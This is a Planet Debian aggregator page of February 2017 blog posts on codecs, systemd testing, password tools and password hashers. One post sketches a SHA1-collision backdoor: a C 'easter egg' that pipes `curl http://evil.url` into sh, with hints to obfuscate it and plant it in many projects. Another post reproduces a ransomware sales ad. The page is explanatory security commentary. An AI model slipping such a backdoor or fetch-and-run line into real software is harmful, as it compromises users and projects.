Planet Debian

Planet Debian - http://planet.debian.org/

Matthew Garrett: The Fantasyland Code of Professionalism is an abuser's fantasy

27 February, 2017 - 08:40
The Fantasyland Institute of Learning is the organisation behind Lambdaconf, a functional programming conference perhaps best known for standing behind a racist they had invited as a speaker. The fallout of that has resulted in them trying to band together events in order to reduce disruption caused by sponsors or speakers declining to be associated with conferences that think inviting racists is more important than the comfort of non-racists, which is weird in all sorts of ways but not what I'm talking about here because they've also written a "Code of Professionalism" which is like a Code of Conduct except it protects abusers rather than minorities and no really it is genuinely as bad as it sounds.

The first thing you need to know is that the document uses its own jargon. Important here are the concepts of active and inactive participation - active participation is anything that you do within the community covered by a specific instance of the Code, inactive participation is anything that happens anywhere ever (ie, active participation is a subset of inactive participation). The restrictions based around active participation are broadly those that you'd expect in a very weak code of conduct - it's basically "Don't be mean", but with some quirks. The most significant is that there's a "Don't moralise" provision, which as written means saying "I think people who support slavery are bad" in a community setting is a violation of the code, but the description of discrimination means saying "I volunteer to mentor anybody from a minority background" could also result in any community member not from a minority background complaining that you've discriminated against them. It's just not very good.

Inactive participation is where things go badly wrong. If you engage in community or professional sabotage, or if you shame a member based on their behaviour inside the community, that's a violation. Community sabotage isn't defined and so basically allows a community to throw out whoever they want to. Professional sabotage means doing anything that can hurt a member's professional career. Shaming is saying anything negative about a member to a non-member if that information was obtained from within the community.

So, what does that mean? Here are some things that you are forbidden from doing:
  • If a member says something racist at a conference, you are not permitted to tell anyone who is not a community member that this happened (shaming)
  • If a member tries to assault you, you are not allowed to tell the police (shaming)
  • If a member gives a horribly racist speech at another conference, you are not allowed to suggest that they shouldn't be allowed to speak at your event (professional sabotage)
  • If a member of your community reports a violation and no action is taken, you are not allowed to warn other people outside the community that this is considered acceptable behaviour (community sabotage)

Now, clearly, some of these are unintentional - I don't think the authors of this policy would want to defend the idea that you can't report something to the police, and I'm sure they'd be willing to modify the document to permit this. But it's indicative of the mindset behind it. This policy has been written to protect people who are accused of doing something bad, not to protect people who have something bad done to them.

There are other examples of this. For instance, violations are not publicised unless the verdict is that they deserve banishment. If a member harasses another member but is merely given a warning, the victim is still not permitted to tell anyone else that this happened. The perpetrator is then free to repeat their behaviour in other communities, and the victim has to choose between either staying silent or warning them and risk being banished from the community for shaming.

If you're an abuser then this is perfect. You're in a position where your victims have to choose between their career (which will be harmed if they're unable to function in the community) and preventing the same thing from happening to others. Many will choose the former, which gives you far more freedom to continue abusing others. Which means that communities adopting the Fantasyland code will be more attractive to abusers, and become disproportionately populated by them.

I don't believe this is the intent, but it's an inevitable consequence of the priorities inherent in this code. No matter how many corner cases are cleaned up, if a code prevents you from saying bad things about people or communities it prevents people from being able to make informed choices about whether that community and its members are people they wish to associate with. When there are greater consequences to saying someone's racist than them being racist, you're fucking up badly.


Steinar H. Gunderson: 10-bit H.264 tests

27 February, 2017 - 07:02

Following the post about 10-bit Y'CbCr earlier this week, I thought I'd make an actual test of 10-bit H.264 compression for live streaming. The basic question is: sure, it's better per bit, but it's also slower, so is it better per MHz? This is largely inspired by Ronald Bultje's post about streaming performance, where he largely showed that HEVC is currently useless for live streaming from software; unless you can encode at x264's “veryslow” preset (which, at 720p60, means basically rather simple content and 20 cores or so), the best x265 presets you can afford will give you worse quality than the best x264 presets you can afford. My results will maybe not be as scientific, but hopefully still enlightening.

I used the same test clip as Ronald, namely a two-minute clip of Tears of Steel. Note that this is an 8-bit input, so we're not testing the effects of 10-bit input; it's just testing the increased internal precision in the codec. Since my focus is practical streaming, I ran the latest version of x264 with four threads (a typical desktop machine), using one-pass encoding at 4000 kbit/sec. Nageru's speed control has 26 presets to choose from, which gives pretty smooth steps between neighboring ones, but I've been sticking to the ten standard x264 presets (ultrafast, superfast, veryfast, faster, fast, medium, slow, slower, veryslow, placebo). Here's the graph:

The x-axis is seconds used for the encode (note the logarithmic scale; placebo takes 200–250 times as long as ultrafast). The y-axis is SSIM dB, so up and to the left is better. The blue line is 8-bit, and the red line is 10-bit. (I ran most encodes five times and averaged the results, but it doesn't really matter, due to the logarithmic scale.)

The results are actually much stronger than I assumed; if you run on (8-bit) ultrafast or superfast, you should stay with 8-bit, but from there on, 10-bit is on the Pareto frontier. Actually, 10-bit veryfast (18.187 dB) is better than 8-bit medium (18.111 dB), while being four times as fast!
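For reference, the individual encodes look roughly like this (a sketch, not my exact test harness; the input file name is made up, and --output-depth needs a reasonably recent x264 — at the time of writing, 10-bit output required a separately compiled build):

# 8-bit encode: 4 threads, one-pass 4000 kbit/sec, SSIM measurement enabled
x264 --threads 4 --preset veryfast --tune ssim --ssim \
     --bitrate 4000 -o out-8bit.mkv tears_of_steel_720p60.y4m

# the same encode with 10-bit internal precision
x264 --threads 4 --preset veryfast --tune ssim --ssim \
     --bitrate 4000 --output-depth 10 -o out-10bit.mkv tears_of_steel_720p60.y4m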

But not all of us have an intuitive feel for dB quality numbers, so I also did a test that is perhaps easier to relate to, centered around the bitrate needed for constant quality. I locked quality to 18 dB, i.e., for each preset, I adjusted the bitrate until the SSIM showed 18.000 dB plus/minus 0.001 dB. (Note that this means faster presets get less of a speed advantage, because they need higher bitrate, which means more time spent entropy coding.) Then I measured the encoding time (again five times) and graphed the results:

x-axis is again seconds, and y-axis is bitrate needed in kbit/sec, so lower and to the left is better. Blue is again 8-bit and red is again 10-bit.

If the previous graph was enough to make me intrigued, this is enough to make me excited. In general, 10-bit gives 20–30% lower bitrate for the same quality and CPU usage! (Compare this with the supposed “up to 50%” benefits of HEVC over H.264, given infinite CPU usage.) The most dramatic example is when comparing the “medium” presets directly, where 10-bit runs at 2648 kbit/sec versus 3715 kbit/sec (29% lower bitrate!) and is only 5% slower. As one progresses towards the slower presets, the gap narrows somewhat (placebo is 27% slower and “only” 24% lower bitrate), but in the realistic middle range, the difference is quite marked. If you run 3 Mbit/sec at 10-bit, you get the quality of 4 Mbit/sec at 8-bit.

So is 10-bit H.264 a no-brainer? Unfortunately, no; the client hardware support is nearly nil. Not even Skylake, which can do 10-bit HEVC encoding in hardware (and 10-bit VP9 decoding), can do 10-bit H.264 decoding in hardware. Worse still, mobile chipsets generally don't support it. There are rumors that iPhone 6s supports it, but these are unconfirmed; some Android chips support it, but most don't.

I guess this explains a lot of the limited uptake; since it's in some ways a new codec, implementers are more keen to get the full benefits of HEVC instead (even though the licensing situation is really icky). The only scene I know of that has really picked it up as a distribution format is the anime scene, and they're feeling quite specific pains due to their content (large gradients giving pronounced banding in undithered 8-bit).

So, 10-bit H.264: It's awesome, but you can't have it. Sorry :-)

Jonas Meurer: debian lts report 2017.02

26 February, 2017 - 00:22
Debian LTS report for February 2017

February 2017 was my sixth month as a Debian LTS team member. I was allocated 5 hours and had 9.75 hours left over from January 2017. This makes a total of 14.75 hours. I spent all of them doing the following:

  • DLA 831-1: Fix buffer overflows in gtk-vnc
  • Reviewed the apache2 2.2.22-13+deb7u8 upload, improved the patches
  • Reviewed CVE-2017-5666 (mp3splt)
  • DLA 836-1: Fix command injection vulnerability in munin cgi script

Stefano Zacchiroli: Software Freedom Conservancy matching

25 February, 2017 - 22:15
become a Conservancy supporter by February 28th and have your donation matched

Non-profits that provide project support have proven themselves to be necessary for the success and advancement of individual projects and Free Software as a whole. The Free Software Foundation (founded in 1985) serves as a home to GNU projects and a canonical list of Free Software licenses. The Open Source Initiative came about in 1998, maintaining the Open Source Definition, based on the Debian Free Software Guidelines, with affiliate members including Debian, Mozilla, and the Wikimedia Foundation. Software in the Public Interest (SPI) was created in the late 90s largely to act as a fiscal sponsor for projects like Debian, enabling it to do things like accept donations and handle other financial transactions.

More recently (2006), the Software Freedom Conservancy was formed. Among other activities—like serving as a fiscal sponsor, infrastructure provider, and support organization for a number of free software projects including Git, Outreachy, and the Debian Copyright Aggregation Project—they protect user freedom via copyleft compliance and GPL enforcement work. Without a willingness to act when licenses are violated, copyleft has no power. Through communication, collaboration, and—only as last resort—litigation, the Conservancy helps everyone who uses a freedom respecting license.

The Conservancy has been aggressively fundraising in order to not just continue its current operations, but to expand its work, staff, and efforts. It recently launched a donation-matching campaign thanks to the generosity and dedication of an anonymous donor. Everyone who joins the Conservancy as an annual Supporter by February 28th will have their donation matched.

A number of us are already supporters, and we hope you will join us in supporting the work of an organization that supports us.

Martin Pitt: systemd 233 about to be released, please help testing

25 February, 2017 - 19:41

systemd 233 is scheduled to be released next week, and there is only a handful of small issues left. As usual there are tons of improvements and fixes, but the most intrusive one is probably another attempt to move from the legacy cgroup v1 setup to a “hybrid” setup where the new unified (cgroup v2) hierarchy is mounted at /sys/fs/cgroup/unified/ and the legacy one stays at /sys/fs/cgroup/ as usual. This should provide an easier path for software like Docker or LXC to migrate to the unified hierarchy, but even that hybrid mode broke some bits.

While systemd 233 will not make it into Debian stretch or Ubuntu zesty, as both are in feature freeze, it will soon be available in Debian experimental, and in the next Ubuntu release after 17.04 gets released. Thus now is another good time to give this some thorough testing!

To help with this, please give the PPA with builds from upstream master a spin. In addition to the usual packages for Ubuntu 16.10 I also uploaded a build for Ubuntu zesty, and a build for Debian stretch (aka testing) which also works on Debian sid. You can use that URL as an apt source:

deb [trusted=yes] https://people.debian.org/~mpitt/tmp/systemd-master-20170225/ /
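For example, something like this should work (a sketch; the file name under sources.list.d is arbitrary):

echo 'deb [trusted=yes] https://people.debian.org/~mpitt/tmp/systemd-master-20170225/ /' \
  | sudo tee /etc/apt/sources.list.d/systemd-master-test.list
sudo apt update
sudo apt install systemd udev libsystemd0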

These packages pass our autopkgtests and I tested them manually too. LXC and LXD work fine, docker.io/runc needs a fix which I uploaded to Ubuntu zesty. (It’s not yet available in Debian, sorry.)

Please file reports about regressions on GitHub, but please also let me know about successes on my Google+ page so that we can get some idea of how many people have tested this.

Thank you, and happy booting!

Gunnar Wolf: Started getting ads for ransomware. Coincidence?

25 February, 2017 - 02:06

Very strange. Verrrry strange.

Yesterday I wrote a blog post on spam stuff that has been hitting my mailbox. Nothing too deep, just me scratching my head.

Coincidentally (I guess/hope), I have been getting messages via my Bitlbee to one of my Jabber accounts, offering me ransomware services. I am reproducing it here, omitting of course everything I can recognize as their brand names and related URLs (as I'm not going to promote the 3vi1-doers). I'm reproducing this in full as I'm sure the information will be interesting for some.

*BRAND* Ransomware - The Most Advanced and Customisable you've Ever Seen
Conquer your Independence with *BRAND* Ransomware Full Lifetime License!
* UNIQUE FEATURES
* NO DEPENDENCIES (.net or whatever)!!!
* Edit file Icon and UAC - Works on All Windows Versions
* Set Folders and Extensions to Encrypt, Deadline and Russian Roulette
* Edit the Text, speak with voice (multilang) and Colors for Ransom Window
* Enable/disable USB infect, network spread & file melt
* Set Process Name, sleep time, update ransom amount, Give mercy button
* Full-featured headquarter (for Windows) with unlimited builds, PDF reports, charts and maps, totally autonomous operation
* PHP Bridges instead of expensive C&C servers!
* Automatic Bitcoin payment detection (impossible to bypass/crack - we challege who says the contrary to prove what they say!)
* Totally/Mathematically IMPOSSIBLE to DECRYPT! Period.
* Award-Winning Five-Stars support and constant updates!
* We Have lot vouchs in *BRAND* Market, can check!
Watch the promo video: *URL*
Screenshots: *URL*
Website: *URL*
Price: $389
Promo: just $309 - 20% OFF! until 25th Feb 2017
Jabber: *JID*

I think I can comment on this with my students. Hopefully, this is interesting to others.
Now... I had never received Jabber spam before. This message has been sent to me 14 times in the last 24 hours (all from different JIDs, all unknown to me). I hope this does not last forever :-/ Otherwise, I will have to learn more about how to configure Bitlbee to ignore contacts not known to me. Grrr...

Jonathan Dowland: OpenShift Java S2I

24 February, 2017 - 22:21

One of the products I have done some work on at Red Hat has recently been released to customers and there have been a few things written about it:

Ritesh Raj Sarraf: Shivratri

24 February, 2017 - 21:43

The truth of life is the cremation ground;
it is the abode of Shiva.

Kali's tandava dance
offers its salutation to Shiva.

Sven Hoexter: Tcl and https - back to TclCurl

24 February, 2017 - 19:04

Must be the irony of life that I was about to give up the TclCurl Debian package some time ago, and now I'm using it again for some very old and horrible web scraping code.

The world moved on to https but the Tcl http package only supports unencrypted http. You can combine it with the tls package as explained in the Wiki, but that seems to be overly complicated compared to just loading the TclCurl binding and moving on with something like this:

package require TclCurl
# download to a variable
curl::transfer -url https://sven.stormbind.net -bodyvar page
# or store it in a file
curl::transfer -url https://sven.stormbind.net -file page.html

Now the remaining problem is that the code is unmaintained upstream and there is one codebase on Bitbucket and one on GitHub. While I fed patches to the Bitbucket repo and thus based the Debian package on that repo, the GitHub repo has diverged in a different direction.

Joey Hess: SHA1 collision via ASCII art

24 February, 2017 - 08:06

Happy SHA1 collision day everybody!

If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files.

The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\

(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.)
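For reference, git's blob id is just the SHA1 of a short header followed by the file content, which is why baking that header into the common prefix makes the git object ids themselves collide. A quick way to convince yourself of the construction (assuming GNU coreutils, and good.c as a stand-in file name):

file=good.c
# git computes SHA1("blob <size in bytes>\0" + content)
( printf 'blob %s\0' "$(wc -c < "$file")"; cat "$file" ) | sha1sum
git hash-object "$file"   # prints the same hash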

Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks.

The "good" data chunk might then look like this:

7*yLN#!NOKj@{FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ

And the "bad" data chunk like this:

9xiV^Ksn=<A!<^}l4~`uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e}Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh

Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is.

Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:

7*yLN#!NOK
3*\LN'\NO@
3*/LN  \.A
5*\LN   \.
>=======:)
5*\7N   /.
3*/7N  /.V
3*\7N'/NO@
7*y7N#!NOX

Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */

/* Call this at the top of main(); it needs <string.h>, <stdio.h> and <stdlib.h>. */
void check_display_easter_egg (char **argv) {
    if (argv[1] && strcmp(argv[1], "--easter-egg") == 0)
        printf(amazing_ascii_art);
    if (amazing_ascii_art[0] == '9')   /* '9' is the first char of the "bad" chunk */
        system("curl http://evil.url | sh");
}

Now, you need a C obfuscation person to make that backdoor a little less obvious. (Hint: Add code to fix the newlines, paint additional ASCII sprites over the top of the static art, add animations, etc., and bury the shellcode in there.)

After a little work, you'll have a C file that any project would like to add, to be able to display a great ASCII-art easter egg. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs.

Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chunk. You can then replace the good file with the bad version here and there, and no one will be the wiser (except the easter egg will display the "bad" first line before it roots them).

Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper.

You can pick either of these two lessons to take away:

  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo

  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

Steve Kemp: Rotating passwords

24 February, 2017 - 07:00

Like many people I use a password manager to record logins to websites. I previously used a tool called pwsafe, but these days I've switched to using pass.

Although I don't like the fact that the metadata is exposed, the tool is very useful, and its integration with git is both simple and reliable.

Reading about the security issue that recently affected cloudflare made me consider rotating some passwords. Using git I figured I could look at the last update-time of my passwords. Indeed that was pretty simple:

git ls-tree -r --name-only HEAD | while read filename; do
  echo "$(git log -1 --format="%ad" -- $filename) $filename"
done

Of course that's not quite enough because we want it sorted, and to do that using the seconds-since-epoch is neater. All together I wrote this:

#!/bin/sh
#
# Show password age - should be useful for rotation - we first of all
# format the timestamp of every *.gpg file, as both unix+relative time,
# then we sort, and finally we output that sorted data - but we skip
# the first field which is the unix-epoch time.
#
( git ls-tree -r --name-only HEAD | grep '\.gpg$' | while read filename; do \
      echo "$(git log -1 --format="%at %ar" -- $filename) $filename" ; done ) \
        | sort | awk '{for (i=2; i<NF; i++) printf $i " "; print $NF}'

Not the cleanest script I've ever hacked together, but the output is nice:

 steve@ssh ~ $ cd ~/Repos/personal/pass/
 steve@ssh ~/Repos/personal/pass $ ./password-age | head -n 5
 1 year, 10 months ago GPG/root@localhost.gpg
 1 year, 10 months ago GPG/steve@steve.org.uk.OLD.gpg
 1 year, 10 months ago GPG/steve@steve.org.uk.NEW.gpg
 1 year, 10 months ago Git/git.steve.org.uk/root.gpg
 1 year, 10 months ago Git/git.steve.org.uk/skx.gpg

Now I need to pick the sites that are more than a year old and rotate credentials. Or delete accounts, as appropriate.

Stig Sandbeck Mathisen: Change all the passwords (again)

24 February, 2017 - 06:00

Looks like it is time to change all the passwords again. There’s a tiny little flaw in a CDN used … everywhere, it seems.

Here’s a quick hack for users of the “pass” password manager to quickly find the domains affected. It is not perfect, but it is fast. :)

#!/bin/bash

# Stig Sandbeck Mathisen <ssm@fnord.no>

# Checks the content of "pass" against the list of sites using cloudflare.
# Expect false positives, and possibly false negatives.

# TODO: remove the left part of each hostname from pass, to check domains.

set -euo pipefail

tempdir=$(mktemp -d)
trap 'echo >&2 "removing ${tempdir}" ; rm -rf "$tempdir"' EXIT

git clone https://github.com/pirate/sites-using-cloudflare.git "$tempdir"

grep -F -x -f \
  <(pass git ls-files  | sed -e s,/,\ ,g -e s/.gpg// | xargs -n 1 | sort -u) \
  "${tempdir}/sorted_unique_cf.txt" \
  | sort -u

Update: The previous example used parallel. Actually, I didn’t need that. Turns out, using grep correctly is much faster than using grep the wrong way. Lesson: Read the manual. :)

Steinar H. Gunderson: Fyrrom recording released

24 February, 2017 - 05:28

The recording of yesterday's Fyrrom (Samfundet's unofficial take on Boiler Room) is now available on YouTube. Five video inputs, four hours, two DJs, no dropped frames. Good times.

Soundcloud coming soon!

Joerg Jaspert: Automated wifi login

24 February, 2017 - 03:32

If you regularly have the misfortune of needing to click some silly “Login” button for some wifi, the following little script may help you avoid this idiotic (and useless) task.

This example uses the WIFIonICE, the free wifi on german ICE trains, simply as I have it twice a day, and got annoyed by the pointless Login button. A friend pointed me at just wget-ting the login page, so I made Network-Manager do this for me. Should work for anything similar that doesn’t need some elaborate webform filled out.

#!/bin/bash

# (Some) docs at
# https://wiki.ubuntuusers.de/NetworkManager/Dispatcher/

IFACE=${1:-"none"}
ACTION=${2:-"up"}

case ${ACTION} in
    up)
        CONID=${CONNECTION_ID:-$(iwconfig $IFACE | grep ESSID | cut -d":" -f2 | sed 's/^[^"]*"\|"[^"]*$//g')}
        if [[ ${CONID} == WIFIonICE ]]; then
            /usr/bin/timeout -k 20 15 /usr/bin/wget -q -O - http://www.wifionice.de/?login > /dev/null
        fi
        ;;
    *)
        # We are not interested in this
        :
        ;;
esac

This script needs to be put into /etc/NetworkManager/dispatcher.d and made executable, owned by the root user. It will run on every connection change; that's why the ACTION is checked. The case may be a bit much here, but it could easily be extended to do a lot more.

Yay, no more silly “Open this webpage and press login” crap.

Lucas Nussbaum: Implementing “right to disconnect” by delaying outgoing email?

23 February, 2017 - 14:26

France passed a law about the “right to disconnect” (more info here or here). The idea of not sending professional emails when people are not supposed to read them, in order to protect their private lives, is a pretty good one, especially when hierarchy is involved. However, I tend to do email at random times, and I would rather continue doing that, but just delay the actual sending of the email to an appropriate time (e.g., when I write email in the evening, it would actually be sent the following morning at 9am).

I wonder how I could make this fit into my email workflow. I write email using mutt on my laptop, then push it locally to nullmailer, which then relays it, over an SSH tunnel, to a remote server (running Exim4).

Of course the fallback solution would be to use mutt’s postponing feature. Or to draft the email in a text editor. But that’s not really nice, because it requires going back to the email at the appropriate time. I would like a solution where I would write the email, add a header (or maybe manually add a Date: header — in all cases that header should reflect the time the mail was sent, not the time it was written), send the email, and have nullmailer or the remote server queue it until the appropriate time is reached (e.g., delaying while “current_time < Date header in email”). I don’t want to do that for all emails: e.g. personal emails can go out immediately.

Any ideas on how to implement that? I’m attached to mutt and relaying using SSH, but not attached to nullmailer or exim4. Ideally the delaying would happen on my remote server, so that my laptop doesn’t need to be online at the appropriate time.
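Not an answer to the server-side question, but here is one way a laptop-side hack could look (a sketch under plenty of assumptions: the real MTA binary has been moved aside to sendmail.real, atd is running, and the 9:00–18:00 window is arbitrary; it also doesn't touch the Date: header issue discussed in the updates below):

#!/bin/bash
# Drop-in "sendmail" wrapper: mail submitted outside working hours is
# handed to at(1) and only submitted to the real MTA at 09:00.
set -e
msg=$(mktemp /var/tmp/delayed-mail.XXXXXX)
cat > "$msg"
hour=$((10#$(date +%H)))
if [ "$hour" -ge 9 ] && [ "$hour" -lt 18 ]; then
    /usr/sbin/sendmail.real "$@" < "$msg"
    rm -f "$msg"
else
    # at(1) treats a time that has already passed today as tomorrow,
    # so evening mail goes out the next morning at 09:00.
    echo "/usr/sbin/sendmail.real $* < '$msg' && rm -f '$msg'" | at 09:00
fi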

Update: mutt does not allow setting the Date: field manually (if you enable the edit_headers option and edit it manually, its value gets overwritten). I have not found the relevant code yet, but that behaviour is mentioned in that bug.

Update 2: ah, it’s this code in sendlib.c (and there’s no way to configure that behaviour):

 /* mutt_write_rfc822_header() only writes out a Date: header with
 * mode == 0, i.e. _not_ postponment; so write out one ourself */
 if (post)
   fprintf (msg->fp, "%s", mutt_make_date (buf, sizeof (buf)));

Gunnar Wolf: Spam: Tactics, strategy, and angry bears

23 February, 2017 - 12:55

I know spam is spam is spam, and I know trying to figure out any logic underneath it is a lost cause. However... I am curious.

Many spam subjects are seemingly random, designed to convey whatever "information" they contain and fool spam filters. I understand that.

Many spam subjects are time-related. As an example, in the last months there has been a surge of spam mentioning Donald Trump. I am thankful: Very easy to filter out, even before it reaches spamassassin.

Of course, spam will find thousands of ways to talk about sex; cialis/viagra sellers, escort services, and a long list of WTF.

However... Tactical flashlights. Bright enough to blind a bear.

WTF‽‽‽

I mean... Truly. Really. WTF‽‽

What does that mean? Why is that even a topic? Who is interested in anything like that? How often does the average person go camping in the woods? Why do we need to worry about stupid bears attacking us? Why would a bear attack me?

The list of WTF questions could go on forever. What am I missing? What does "tactical flashlight" mean that I just fail to grasp? Has this appeared in your spam?

Antoine Beaupré: The case against password hashers

23 February, 2017 - 00:00

In previous articles, we have looked at how to generate passwords and did a review of various password managers. There is, however, a third way of managing passwords other than remembering them or encrypting them in a "vault", which is what I call "password hashing".

A password hasher generates site-specific passwords from a single master password using a cryptographic hash function. It thus allows a user to have a unique and secure password for every site they use while requiring no storage; they need only to remember a single password. You may know these as "deterministic or stateless password managers" but I find the "password manager" phrase to be confusing because a hasher doesn't actually store any passwords. I do not think password hashers represent a good security tradeoff so I generally do not recommend their use, unless you really do not have access to reliable storage that you can access readily.

In this article, I use the word "password" for a random string used to unlock things, but "token" to represent a generated random string that the user doesn't need to remember. The input to a password hasher is a password with some site-specific context and the output from a password hasher is a token.

What is a password hasher?

A password hasher uses the master password and a label (generally the host name) to generate the site-specific password. To change the generated password, the user can modify the label, for example by appending a number. Some password hashers also have different settings to generate tokens of different lengths or compositions (symbols or not, etc.) to accommodate different site-specific password policies.
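As a toy illustration of the idea (emphatically not the construction any of the tools discussed here use — a single unsalted hash round is exactly the kind of weakness examined later in this article):

#!/bin/bash
# Usage: ./toy-hasher example.com   (toy demo only, do not use for real passwords)
site="$1"
read -r -s -p "master password: " master; echo
printf '%s:%s' "$master" "$site" \
    | openssl dgst -sha256 -binary \
    | openssl base64 \
    | cut -c1-16        # site-specific 16-character token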

The whole concept of password hashers relies on the concept of one-way cryptographic hash functions or key derivation functions that take an arbitrary input string (say a password) and generate a unique token, from which it is impossible to guess the original input string. Password hashers are generally written as JavaScript bookmarklets or browser plugins and have been around for over a decade.

The biggest advantage of password hashers is that you only need to remember a single password. You do not need to carry around a password manager vault: there's no "state" (other than site-specific settings, which can be easily guessed). A password hasher named Master Password makes a compelling case against traditional password managers in its documentation:

It's as though the implicit assumptions are that everybody backs all of their stuff up to at least two different devices and backups in the cloud in at least two separate countries. Well, people don't always have perfect backups. In fact, they usually don't have any.

It goes on to argue that, when you lose your password: "You lose everything. You lose your own identity."

The stateless nature of password hashers also means you do not need to use cloud services to synchronize your passwords, as there is (generally, more on that later) no state to carry around. This means, for example, that the list of accounts that you have access to is only stored in your head, and not in some online database that could be hacked without your knowledge. The downside of this is, of course, that attackers do not actually need to have access to your password hasher to start cracking it: they can try to guess your master key without ever stealing anything from you other than a single token you used to log into some random web site.

Password hashers also necessarily generate unique passwords for every site you use them on. While you can also do this with password managers, it is not an enforced decision. With hashers, you get distinct and strong passwords for every site with no effort.

The problem with password hashers

If hashers are so great, why would you use a password manager? Programs like LessPass and Master Password seem to have strong crypto that is well implemented, so why isn't everyone using those tools?

Password hashing, as a general concept, actually has serious problems: since the hashing outputs are constantly compromised (they are sent in password forms to various possibly hostile sites), it's theoretically possible to derive the master password and then break all the generated tokens in one shot. The use of stronger key derivation functions (like PBKDF2, scrypt, or HMAC) or seeds (like a profile-specific secret) makes those attacks much harder, especially if the seed is long enough to make brute-force attacks infeasible. (Unfortunately, in the case of Password Hasher Plus, the seed is derived from Math.random() calls, which are not considered cryptographically secure.)

Basically, as stated by Julian Morrison in this discussion:

A password is now ciphertext, not a block of line noise. Every time you transmit it, you are giving away potential clues of use to an attacker. [...] You only have one password for all the sites, really, underneath, and it's your secret key. If it's broken, it's now a skeleton-key [...]

Newer implementations like LessPass and Master Password fix this by using reasonable key derivation algorithms (PBKDF2 and scrypt, respectively) that are more resistant to offline cracking attacks, but who knows how long those will hold? To give a concrete example, if you would like to use the new winner of the password hashing competition (Argon2) in your password manager, you can patch the program (or wait for an update) and re-encrypt your database. With a password hasher, it's not so easy: changing the algorithm means logging in to every site you visited and changing the password. As someone who used a password hasher for a few years, I can tell you this is really impractical: you quickly end up with hundreds of passwords. The LessPass developers tried to facilitate this, but they ended up mostly giving up.

Which brings us to the question of state. A lot of those tools claim to work "without a server" or as being "stateless" and while those claims are partly true, hashers are way more usable (and more secure, with profile secrets) when they do keep some sort of state. For example, Password Hasher Plus records, in your browser profile, which site you visited and which settings were used on each site, which makes it easier to comply with weird password policies. But then that state needs to be backed up and synchronized across multiple devices, which led LessPass to offer a service (which you can also self-host) to keep those settings online. At this point, a key benefit of the password hasher approach (not keeping state) just disappears and you might as well use a password manager.

Another issue with password hashers is choosing the right one from the start, because changing software generally means changing the algorithm, and therefore changing passwords everywhere. If there were a well-established program that was recognized as a solid cryptographic solution by the community, I would feel more confident. But what I have seen is that there are a lot of different implementations, each with its own warts and flaws; because changing is so painful, I can't actually use any of those alternatives.

All of the password hashers I have reviewed have severe security versus usability tradeoffs. For example, LessPass has what seems to be a sound cryptographic implementation, but using it requires you to click on the icon, fill in the fields, click generate, and then copy the password into the field, which means at least four or five actions per password. The venerable Password Hasher is much easier to use, but it makes you type the master password directly in the site's password form, so hostile sites can simply use JavaScript to sniff the master password while it is typed. While there are workarounds implemented in Password Hasher Plus (the profile-specific secret), both tools are more or less abandoned now. The Password Hasher homepage, linked from the extension page, is now a 404. Password Hasher Plus hasn't seen a release in over a year and there is no space for collaborating on the software — the homepage is simply the author's Google+ page with no information on the project. I couldn't actually find the source online and had to download the Chrome extension by hand to review the source code. Software abandonment is a serious issue for every project out there, but I would argue that it is especially severe for password hashers.

Furthermore, I have had difficulty using password hashers in unified login environments like Wikipedia's or StackExchange's single-sign-on systems. Because they allow you to log in with the same password on multiple sites, you need to choose (and remember) what label you used when signing in. Did I sign in on stackoverflow.com? Or was it stackexchange.com?

Also, as mentioned in the previous article about password managers, web-based password managers have serious security flaws. Since more than a few password hashers are implemented using bookmarklets, they bring all of those serious vulnerabilities with them, which can range from account name to master password disclosures.

Finally, some of the password hashers use dubious crypto primitives that were valid and interesting a decade ago, but are really showing their age now. Stanford's pwdhash uses MD5, which is considered "cryptographically broken and unsuitable for further use". We have seen partial key recovery attacks against MD5 already and while those do not allow an attacker to recover the full master password yet (especially not with HMAC-MD5), I would not recommend anyone use MD5 in anything at this point, especially if changing that algorithm later is hard. Some hashers (like Password Hasher and Password Plus) use a single round of SHA-1 to derive a token from a password; WPA2 (standardized in 2004) uses 4096 iterations of HMAC-SHA1. A recent US National Institute of Standards and Technology (NIST) report also recommends "at least 10,000 iterations of the hash function".
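To make the difference concrete, here is a toy comparison (not any hasher's actual construction; the second command assumes an OpenSSL new enough to have the -pbkdf2 and -iter options for openssl enc, and -P merely prints the derived key material without encrypting anything):

# one unsalted SHA-1 round, the kind of derivation the older hashers above use
printf '%s' 'master-password:example.com' | openssl dgst -sha1

# a salted PBKDF2 derivation with 10,000 iterations, roughly the NIST floor quoted above
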